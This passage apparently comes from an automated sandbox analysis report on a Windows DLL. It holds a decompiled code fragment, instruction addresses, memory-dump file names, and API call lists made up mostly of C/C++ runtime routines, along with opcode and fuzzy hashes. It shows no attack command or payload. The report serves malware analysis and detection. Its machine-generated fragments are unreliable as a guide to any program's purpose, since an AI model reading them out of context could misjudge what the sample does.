								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6E192370(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6E1923CB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6E192467(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x6e192268
0x6e192269
0x6e19226a
0x6e19226d
0x6e19226f
0x6e192272
0x6e192273
0x6e192275
0x6e192276
0x6e192277
0x6e19227a
0x6e192284
0x6e192335
0x6e19233c
0x6e192345
0x6e19228a
0x6e19228a
0x6e192290
0x6e192296
0x6e192299
0x6e19229c
0x6e1922a0
0x6e1922a5
0x6e1922aa
0x6e19232a
0x00000000
0x6e1922ac
0x6e1922ac
0x6e1922b8
0x6e1922ba
0x6e192315
0x6e192315
0x6e19231b
0x00000000
0x6e1922bc
0x6e1922cb
0x6e1922cd
0x6e1922ce
0x6e1922cf
0x6e1922d2
0x6e1922d2
0x6e1922d4
0x00000000
0x6e1922d6
0x6e1922d6
0x6e192320
0x6e1922d8
0x6e1922d8
0x6e1922dc
0x6e1922e4
0x6e1922e9
0x6e1922ee
0x6e1922fa
0x6e192302
0x6e192309
0x6e19230f
0x6e192313
0x00000000
0x6e192313
0x6e1922d6
0x6e1922d4
0x00000000
0x6e1922ba
0x6e19232e
0x6e19232e
0x6e19232e
0x6e1922aa
0x6e19234a
0x6e192351

Memory Dump Source

Source File: 00000000.00000002.475997474.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000000.00000002.475985829.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476010509.000000006E193000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476032760.000000006E195000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476045243.000000006E196000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 53c3ad8cca0431a2163c07d76a2e72cd4d87658ea62d4dee2b546d09cb764011
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 9821B332900205AFCB10DFA8D8809ABBBA9FF4D350B468568D9159B245DB30FA55EBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E21E337, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.476398807.000000006E21E000.00000040.00020000.sdmp, Offset: 6E21E000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: 8229df85b4ab02b5d3c4ede292ae8f3641f30e1206619a7d7fd3b9c14fa55717
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: 0B11E6733441059FD754CE99DC90EE6B3DAFB89330B298166EE08CB705E635E841C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E21E730, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.476398807.000000006E21E000.00000040.00020000.sdmp, Offset: 6E21E000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
Instruction ID: 9e2ba33273ac595b528955a17afe8bc8fa4bb8bae50e865bfb0f042c61c30e2b
Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
Instruction Fuzzy Hash: 9A01667631830A8FF304CF59DD94DA9BBE5EBC2325B18807EC64683A15D130E642CA10

Uniqueness

Uniqueness Score: -1.00%

Function 6E20227F, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecb42c1d12d40f1a0af8a500848935c0d28a4c93e3a3cea091b94fc400f67602
Instruction ID: 45c373a79e5d971c87dcbb950ae1895b79055afdfda8544a18b0c73ccdaafe21
Opcode Fuzzy Hash: ecb42c1d12d40f1a0af8a500848935c0d28a4c93e3a3cea091b94fc400f67602
Instruction Fuzzy Hash: 60E08C7291122CEFCB10CBC8D910D8AF3FDEB44A04B11099AB501D3541D270EE01C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E4296, Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 339COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 6E1E4363
DName::operator+.LIBCMT ref: 6E1E43A0
DName::DName.LIBVCRUNTIME ref: 6E1E43B4
DName::operator+.LIBCMT ref: 6E1E43C3
DName::operator+.LIBCMT ref: 6E1E4451
DName::operator|=.LIBCMT ref: 6E1E446D
DName::DName.LIBVCRUNTIME ref: 6E1E4479
DName::operator+.LIBCMT ref: 6E1E4487
DName::operator+.LIBCMT ref: 6E1E44C1
DName::operator+.LIBCMT ref: 6E1E4502
UnDecorator::getReturnType.LIBCMT ref: 6E1E4532
operator+.LIBVCRUNTIME ref: 6E1E463F

Strings

), xrefs: 6E1E42CC

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
String ID: )
API String ID: 1186856153-2427484129
Opcode ID: 3dc7f93b7b14526c9ef847c74ef840eb22e6344a49d8db48730dc9485ad4efb1
Instruction ID: d7bb7d80f62beadf1a81a0014ee68ec60d9fad5ed4b4c89ebe72d5ee059a2ccf
Opcode Fuzzy Hash: 3dc7f93b7b14526c9ef847c74ef840eb22e6344a49d8db48730dc9485ad4efb1
Instruction Fuzzy Hash: D1C1A7B5A00A09AFDB04CFD4D495EED77B9AF19314F144469F112EBA80EF309AC6DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E5561, Relevance: 19.8, APIs: 13, Instructions: 301COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 6E1E55CC
DName::operator+.LIBCMT ref: 6E1E5702

Part of subcall function 6E1E148F: shared_ptr.LIBCMT ref: 6E1E14AB

DName::operator+.LIBCMT ref: 6E1E574E
DName::operator+.LIBCMT ref: 6E1E575D
DName::operator+.LIBCMT ref: 6E1E56B8

Part of subcall function 6E1E6CAB: DName::operator=.LIBVCRUNTIME ref: 6E1E6D3A

DName::operator+.LIBCMT ref: 6E1E588A
DName::operator=.LIBVCRUNTIME ref: 6E1E58CA
DName::DName.LIBVCRUNTIME ref: 6E1E58E2
DName::operator+.LIBCMT ref: 6E1E58F1
DName::operator+.LIBCMT ref: 6E1E58FD

Part of subcall function 6E1E6CAB: Replicator::operator[].LIBVCRUNTIME ref: 6E1E6CE8

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
String ID:
API String ID: 1026175760-0
Opcode ID: d46f4da1e40e1f2425eb69a5d05f87940a761a578054a4a7c4753b14e65c923e
Instruction ID: b8af5b17ae8bfd83474e19b175ad6725666311aaead8c5da53fcf98a8419f21c
Opcode Fuzzy Hash: d46f4da1e40e1f2425eb69a5d05f87940a761a578054a4a7c4753b14e65c923e
Instruction Fuzzy Hash: E7C1C071A00A089FDB14CFE4D855BEEB7F9AF19304F10445DF256ABA80EB359AC4DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E207C68, Relevance: 19.6, APIs: 13, Instructions: 113COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6E207CAC

Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E2092D8
Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E2092EA
Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E2092FC
Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E20930E
Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E209320
Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E209332
Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E209344
Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E209356
Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E209368
Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E20937A
Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E20938C
Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E20939E
Part of subcall function 6E2092BB: _free.LIBCMT ref: 6E2093B0

_free.LIBCMT ref: 6E207CA1

Part of subcall function 6E1FD7F5: HeapFree.KERNEL32(00000000,00000000,?,6E209A83,?,00000000,?,?,?,6E209D87,?,00000007,?,?,6E207DFF,?), ref: 6E1FD80B
Part of subcall function 6E1FD7F5: GetLastError.KERNEL32(?,?,6E209A83,?,00000000,?,?,?,6E209D87,?,00000007,?,?,6E207DFF,?,?), ref: 6E1FD81D

_free.LIBCMT ref: 6E207CC3
_free.LIBCMT ref: 6E207CD8
_free.LIBCMT ref: 6E207CE3
_free.LIBCMT ref: 6E207D05
_free.LIBCMT ref: 6E207D18
_free.LIBCMT ref: 6E207D26
_free.LIBCMT ref: 6E207D31
_free.LIBCMT ref: 6E207D69
_free.LIBCMT ref: 6E207D70
_free.LIBCMT ref: 6E207D8D
_free.LIBCMT ref: 6E207DA5

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: c613bf2713e048f3786a82c4d14eddb9531f6bf4f2daf852a6f4c9da8325e370
Instruction ID: c769d6f7c6b128944bbcf8cbc7d606c4e5266bcc0a22000beda2c567cd443e5c
Opcode Fuzzy Hash: c613bf2713e048f3786a82c4d14eddb9531f6bf4f2daf852a6f4c9da8325e370
Instruction Fuzzy Hash: 7831503190470ADFE761AAB8DC54BAA73FAEF40319F104969E055DB1D0EF70E982DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DFE7A, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMON

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6E1DFF75
type_info::operator==.LIBVCRUNTIME ref: 6E1DFF9C
___TypeMatch.LIBVCRUNTIME ref: 6E1E00A8
CatchIt.LIBVCRUNTIME ref: 6E1E00FD
IsInExceptionSpec.LIBVCRUNTIME ref: 6E1E0183
_UnwindNestedFrames.LIBCMT ref: 6E1E020A
CallUnexpected.LIBVCRUNTIME ref: 6E1E0225

Strings

csm, xrefs: 6E1DFF22
csm, xrefs: 6E1DFFD3
csm, xrefs: 6E1DFEB5

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4234981820-393685449
Opcode ID: 5e20de7fded70ced41c9ff577a79f5acc865cf00b467caca7395f48ed9f802e6
Instruction ID: edd9575ab1677daada76e9ed864a59935687f23a9de2ddbbcbb167fb70292892
Opcode Fuzzy Hash: 5e20de7fded70ced41c9ff577a79f5acc865cf00b467caca7395f48ed9f802e6
Instruction Fuzzy Hash: 53C1AB7280060ADFCF05CFE4C8809DEBBB9BF18314F20445AF8256B655EB71DA95EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E6053, Relevance: 15.3, APIs: 10, Instructions: 253COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 6E1E611F
UnDecorator::getSignedDimension.LIBCMT ref: 6E1E612A
DName::DName.LIBVCRUNTIME ref: 6E1E613B
UnDecorator::getSignedDimension.LIBCMT ref: 6E1E61E0
UnDecorator::getSignedDimension.LIBCMT ref: 6E1E61FD
UnDecorator::getSignedDimension.LIBCMT ref: 6E1E621A
DName::operator+.LIBCMT ref: 6E1E622F
UnDecorator::getSignedDimension.LIBCMT ref: 6E1E6252
swprintf.LIBCMT ref: 6E1E62C3
DName::operator+.LIBCMT ref: 6E1E631A

Part of subcall function 6E1E41AA: DName::DName.LIBVCRUNTIME ref: 6E1E41CE

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$swprintf
String ID:
API String ID: 3689813335-0
Opcode ID: 20c36f88d879a3884e178faf6edd3f969add989e706c028a7115620c5a04decf
Instruction ID: 9f80434696c6076b008f80c4af2838f4f9241b7c8b179dc5ddc4b75289d7681c
Opcode Fuzzy Hash: 20c36f88d879a3884e178faf6edd3f969add989e706c028a7115620c5a04decf
Instruction Fuzzy Hash: B881C572D60A0E9EEB04DBE4C859BFE777C9F11304F904419F31167981DB685AC8EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1FDB64, Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1FDB7A

Part of subcall function 6E1FD7F5: HeapFree.KERNEL32(00000000,00000000,?,6E209A83,?,00000000,?,?,?,6E209D87,?,00000007,?,?,6E207DFF,?), ref: 6E1FD80B
Part of subcall function 6E1FD7F5: GetLastError.KERNEL32(?,?,6E209A83,?,00000000,?,?,?,6E209D87,?,00000007,?,?,6E207DFF,?,?), ref: 6E1FD81D

_free.LIBCMT ref: 6E1FDB86
_free.LIBCMT ref: 6E1FDB91
_free.LIBCMT ref: 6E1FDB9C
_free.LIBCMT ref: 6E1FDBA7
_free.LIBCMT ref: 6E1FDBB2
_free.LIBCMT ref: 6E1FDBBD
_free.LIBCMT ref: 6E1FDBC8
_free.LIBCMT ref: 6E1FDBD3
_free.LIBCMT ref: 6E1FDBE1

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1dff243b997056973e39791b19b1578c8135da16290e901f91df44e41e2751c2
Instruction ID: a46f3d573bc91210f5b0f86a94130f0815f95bc7693e0ad68348373d7dd9b29b
Opcode Fuzzy Hash: 1dff243b997056973e39791b19b1578c8135da16290e901f91df44e41e2751c2
Instruction Fuzzy Hash: 3321677A900108EFCB52DFD8C881EED7BF9BF09254B0146A5E5159F121EB31DA969FC0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E6CAB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

Replicator::operator[].LIBVCRUNTIME ref: 6E1E6CE8
DName::operator=.LIBVCRUNTIME ref: 6E1E6D3A

Strings

@, xrefs: 6E1E6E50

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: Name::operator=Replicator::operator[]
String ID: @
API String ID: 3211817929-2766056989
Opcode ID: f71722a692f399dd7c0ff20a3e030661972237ea74b9870508ffeb3ba06f9ec4
Instruction ID: 9a105a91498530e5bd3bd6211e03abfca53384682c53e39244271f5a457e5b0c
Opcode Fuzzy Hash: f71722a692f399dd7c0ff20a3e030661972237ea74b9870508ffeb3ba06f9ec4
Instruction Fuzzy Hash: 5861C571D10A099FDB04CFD4C855BEEBBB9AF19314F644029F612A76C0DB349A85DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E2831, Relevance: 10.7, APIs: 7, Instructions: 151COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 6E1E28BF
DName::operator+.LIBCMT ref: 6E1E2912

Part of subcall function 6E1E148F: shared_ptr.LIBCMT ref: 6E1E14AB

Part of subcall function 6E1E137E: DName::operator+.LIBCMT ref: 6E1E139F

DName::operator+.LIBCMT ref: 6E1E2903
DName::operator+.LIBCMT ref: 6E1E2963
DName::operator+.LIBCMT ref: 6E1E2970
DName::operator+.LIBCMT ref: 6E1E29B7
DName::operator+.LIBCMT ref: 6E1E29C4

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: Name::operator+$shared_ptr
String ID:
API String ID: 1037112749-0
Opcode ID: 4dd7daa0efdb9891f4b84cf25c3284c6e6a5fe6c4f7a41294a1dfebf80b7b5a2
Instruction ID: 8d2486d05f3ac00037abbd405c9c6e656738b531f9db7b9bdc3a788d6400a1dd
Opcode Fuzzy Hash: 4dd7daa0efdb9891f4b84cf25c3284c6e6a5fe6c4f7a41294a1dfebf80b7b5a2
Instruction Fuzzy Hash: 71517472E00619AFDB05CBD4D861EEEBBFCAF18710F10445AF506A7680DB7496C8DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E3B4F, Relevance: 10.6, APIs: 7, Instructions: 102COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 6E1E3B77
DName::DName.LIBVCRUNTIME ref: 6E1E3BA4

Part of subcall function 6E1E1130: __aulldvrm.LIBCMT ref: 6E1E1161

DName::operator+.LIBCMT ref: 6E1E3BBF
DName::DName.LIBVCRUNTIME ref: 6E1E3BDC
DName::DName.LIBVCRUNTIME ref: 6E1E3C0C
DName::DName.LIBVCRUNTIME ref: 6E1E3C16
DName::DName.LIBVCRUNTIME ref: 6E1E3C3D

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: NameName::$Name::operator+__aulldvrm
String ID:
API String ID: 4069495278-0
Opcode ID: df75531a85de05de552e645bd18ffe135b8f2567ab956df58cc9ee93b84110cf
Instruction ID: 83ac942fea49b576fc3017341b079c8d2140259dc8a47c132120922fa01dbf2c
Opcode Fuzzy Hash: df75531a85de05de552e645bd18ffe135b8f2567ab956df58cc9ee93b84110cf
Instruction Fuzzy Hash: CF3109319049089ECF08CBE8C85AAED77B5BF15314F50445DF0536BAA0DB359AC7EB20

Uniqueness

Uniqueness Score: -1.00%

Function 6E20324C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON

Download Yara Rule

Strings

34 n, xrefs: 6E20329D
C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6E203251

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID:
String ID: 34 n$C:\Windows\SYSTEM32\loaddll32.exe
API String ID: 0-2955852997
Opcode ID: 67dd7151efb1c4f56333748917ac2c3c2949b8567ec6ecbfad3b39967095c1f1
Instruction ID: 74d8c2729b5c8fb23c4cca9227cb1d85febd437c07d4a357403638a91b01a5eb
Opcode Fuzzy Hash: 67dd7151efb1c4f56333748917ac2c3c2949b8567ec6ecbfad3b39967095c1f1
Instruction Fuzzy Hash: C821927161460EBFD7109FE68C88D5A77AEBF027697044A15E928971D0EB30DC518BE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E209D6E, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6E209A59: _free.LIBCMT ref: 6E209A7E

_free.LIBCMT ref: 6E209DBC

Part of subcall function 6E1FD7F5: HeapFree.KERNEL32(00000000,00000000,?,6E209A83,?,00000000,?,?,?,6E209D87,?,00000007,?,?,6E207DFF,?), ref: 6E1FD80B
Part of subcall function 6E1FD7F5: GetLastError.KERNEL32(?,?,6E209A83,?,00000000,?,?,?,6E209D87,?,00000007,?,?,6E207DFF,?,?), ref: 6E1FD81D

_free.LIBCMT ref: 6E209DC7
_free.LIBCMT ref: 6E209DD2
_free.LIBCMT ref: 6E209E26
_free.LIBCMT ref: 6E209E31
_free.LIBCMT ref: 6E209E3C
_free.LIBCMT ref: 6E209E47

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7ac9138cef5ce3a258dca3bbd8fd3fddd9dd8b90217114defab4aa152b3db568
Instruction ID: 83f7ac5edc5f332bb60d81018a932c8f641404aeaa0a6128b3f6e3a98320e0cf
Opcode Fuzzy Hash: 7ac9138cef5ce3a258dca3bbd8fd3fddd9dd8b90217114defab4aa152b3db568
Instruction Fuzzy Hash: 1B118131A40B08EBD731E7F0CC45FDB77DD5F80708F800C15A29A6E090EB68B5566A90

Uniqueness

Uniqueness Score: -1.00%

Function 6E20D915, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 6E20D95D
__fassign.LIBCMT ref: 6E20DB3C
__fassign.LIBCMT ref: 6E20DB59
WriteFile.KERNEL32(?,6E2055A5,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E20DBA1
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E20DBE1
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E20DC8D

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 0e2f82da9f9f5d9d4dec3d7430d43cf27718a9d6af51f008ecfda3a32669b15e
Instruction ID: b44095bfbf41d66d501e5937aa7e276b2e5fc5551638cda2597e0397992dfffd
Opcode Fuzzy Hash: 0e2f82da9f9f5d9d4dec3d7430d43cf27718a9d6af51f008ecfda3a32669b15e
Instruction Fuzzy Hash: 05D17A75D0125D9FCB11CFE8C880AEDBBB6BF49314F24016AE855BB281D631AA46CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1F1545, Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6E1F16CD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E1F16E9
__allrem.LIBCMT ref: 6E1F1700
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E1F171E
__allrem.LIBCMT ref: 6E1F1735
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E1F1753

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 043adf15f1920c78ca3499397aa1f2aa39dfe4a67477a4671773f39f52257892
Instruction ID: 30a1a6366314fb022008bee8427f98c02abbd4cca6c959791ff4e79c06ab10cb
Opcode Fuzzy Hash: 043adf15f1920c78ca3499397aa1f2aa39dfe4a67477a4671773f39f52257892
Instruction Fuzzy Hash: B58107F1B00B06DBE310DEE9CC40B9A73E9AF45724F244A29E515D7292E770D98A9BD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1F2AC0, Relevance: 9.2, APIs: 6, Instructions: 221COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1F2B50
_free.LIBCMT ref: 6E1F2B6B
_free.LIBCMT ref: 6E1F2B76
_free.LIBCMT ref: 6E1F2C83

Part of subcall function 6E1FD792: RtlAllocateHeap.NTDLL(00000008,6E21B004,00000000), ref: 6E1FD7D3

_free.LIBCMT ref: 6E1F2C58

Part of subcall function 6E1FD7F5: HeapFree.KERNEL32(00000000,00000000,?,6E209A83,?,00000000,?,?,?,6E209D87,?,00000007,?,?,6E207DFF,?), ref: 6E1FD80B
Part of subcall function 6E1FD7F5: GetLastError.KERNEL32(?,?,6E209A83,?,00000000,?,?,?,6E209D87,?,00000007,?,?,6E207DFF,?,?), ref: 6E1FD81D

_free.LIBCMT ref: 6E1F2C79

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: _free$Heap$AllocateErrorFreeLast
String ID:
API String ID: 4150789928-0
Opcode ID: 6e74a1fc58ebaa20db2b51548e9e641894ebb50a1363505178dbb128643d0597
Instruction ID: 9efb5e8c4b05c4381178bdeb075e31bdedfe6876d37b1b63a8b1c50b80df2b12
Opcode Fuzzy Hash: 6e74a1fc58ebaa20db2b51548e9e641894ebb50a1363505178dbb128643d0597
Instruction Fuzzy Hash: 3E517A3AA04241DBDB04DFE88850BFA77FDEF85728B640499EC45DB244EA319983E6D0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E6B55, Relevance: 9.1, APIs: 6, Instructions: 120COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 6E1E6B99
DName::operator+.LIBCMT ref: 6E1E6BA5

Part of subcall function 6E1E148F: shared_ptr.LIBCMT ref: 6E1E14AB

DName::operator+=.LIBCMT ref: 6E1E6C65

Part of subcall function 6E1E5561: DName::operator+.LIBCMT ref: 6E1E55CC
Part of subcall function 6E1E5561: DName::operator+.LIBCMT ref: 6E1E588A

Part of subcall function 6E1E137E: DName::operator+.LIBCMT ref: 6E1E139F

DName::operator+.LIBCMT ref: 6E1E6C20

Part of subcall function 6E1E14E7: DName::operator=.LIBVCRUNTIME ref: 6E1E1508

DName::DName.LIBVCRUNTIME ref: 6E1E6C89
DName::operator+.LIBCMT ref: 6E1E6C95

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
String ID:
API String ID: 2795783184-0
Opcode ID: dda557eb39ae9737f075d461ffbc7dc93224c0d42b82fa4155709cd18cafebe3
Instruction ID: 45c1c72b0d11c23c030876b7e1348185c7dbc84caa8a06a61230720fd9a7f72a
Opcode Fuzzy Hash: dda557eb39ae9737f075d461ffbc7dc93224c0d42b82fa4155709cd18cafebe3
Instruction Fuzzy Hash: C14188B1610A4C6FDB04CFE4C455BEE7BFAEB06704F904458F286DBA80DB346A85DB54

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E5913, Relevance: 9.1, APIs: 6, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 6E1E6CAB: Replicator::operator[].LIBVCRUNTIME ref: 6E1E6CE8

DName::operator=.LIBVCRUNTIME ref: 6E1E59B9

Part of subcall function 6E1E5561: DName::operator+.LIBCMT ref: 6E1E55CC
Part of subcall function 6E1E5561: DName::operator+.LIBCMT ref: 6E1E588A

DName::operator+.LIBCMT ref: 6E1E5974
DName::operator+.LIBCMT ref: 6E1E5980
DName::DName.LIBVCRUNTIME ref: 6E1E59CD
DName::operator+.LIBCMT ref: 6E1E59DC
DName::operator+.LIBCMT ref: 6E1E59E8

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
String ID:
API String ID: 955152517-0
Opcode ID: 1b7ce43763d1f921b52ce42203329403da7313bd5873e0b8ce73d96976073094
Instruction ID: 6b1006709a4578b5a7abc73f559166a72a9da5d323af00ee6af1b2e3621b258b
Opcode Fuzzy Hash: 1b7ce43763d1f921b52ce42203329403da7313bd5873e0b8ce73d96976073094
Instruction Fuzzy Hash: CC318DB1604A059FCB08CFD8C891AEEBBF9AF59710F10485DF68797B80DB349684DB24

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DFB0C, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,6E1DF8E3,6E1DE4FE,6E1DDCB2), ref: 6E1DFB1A
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E1DFB28
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E1DFB41
SetLastError.KERNEL32(00000000,?,6E1DF8E3,6E1DE4FE,6E1DDCB2), ref: 6E1DFB93

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 9d4b840aece02696d4ae6f5492a3455082e5876ac1f62b813e2bc6b2c19f59f4
Instruction ID: 1d7a7d0d23c2c282ccbf0f92a50b766f5da6b0ba9896dcd119353732e1bf062f
Opcode Fuzzy Hash: 9d4b840aece02696d4ae6f5492a3455082e5876ac1f62b813e2bc6b2c19f59f4
Instruction Fuzzy Hash: 4101F932918B119EFB1045F45C59AE6276AFB0E67C730032AF630415D4EF514A89B150

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E41AA, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 6E1E41CE
DName::DName.LIBVCRUNTIME ref: 6E1E41F2

Strings

A, xrefs: 6E1E424D

Memory Dump Source

